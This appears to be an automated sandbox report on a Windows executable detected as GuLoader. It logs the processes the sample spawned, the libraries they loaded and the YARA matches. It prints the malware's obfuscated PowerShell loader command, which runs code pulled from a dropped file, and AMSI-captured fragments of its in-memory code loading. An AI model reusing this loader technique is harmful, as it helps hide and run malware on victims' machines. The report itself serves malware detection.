Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: REnBTVfW8q.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

File read: C:\Users\user\Desktop\REnBTVfW8q.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\REnBTVfW8q.exe "C:\Users\user\Desktop\REnBTVfW8q.exe"
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

File written: C:\Program Files (x86)\Common Files\Jervin197.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: REnBTVfW8q.exe

Static file information: File size 1157372 > 1048576

Source: REnBTVfW8q.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.1647881409.000000000C7EF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1647862127.00000000094F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1438403773.0000000002999000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1641405594.0000000006319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.Hav, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nsc2139.tmp, type: DROPPED

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sammensmeltende194 $Konfunderer123 $Polyisobutene), (Baftah @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Morgenmaden = [AppDomain]::CurrentDomain.GetAss
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Factions)), $Laywomen).DefineDynamicModule($Squillagee, $false).DefineType($Nonresistively, $Bastning, [System.MulticastDelegate])$Nac

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0501CE82 push eax; mov dword ptr [esp], edx	2_2_0501CE94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0501D528 push esp; iretd	2_2_0501D571
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0501D590 push esp; iretd	2_2_0501D571
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00C70C77 push edi; retf	5_2_00C70C7A

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
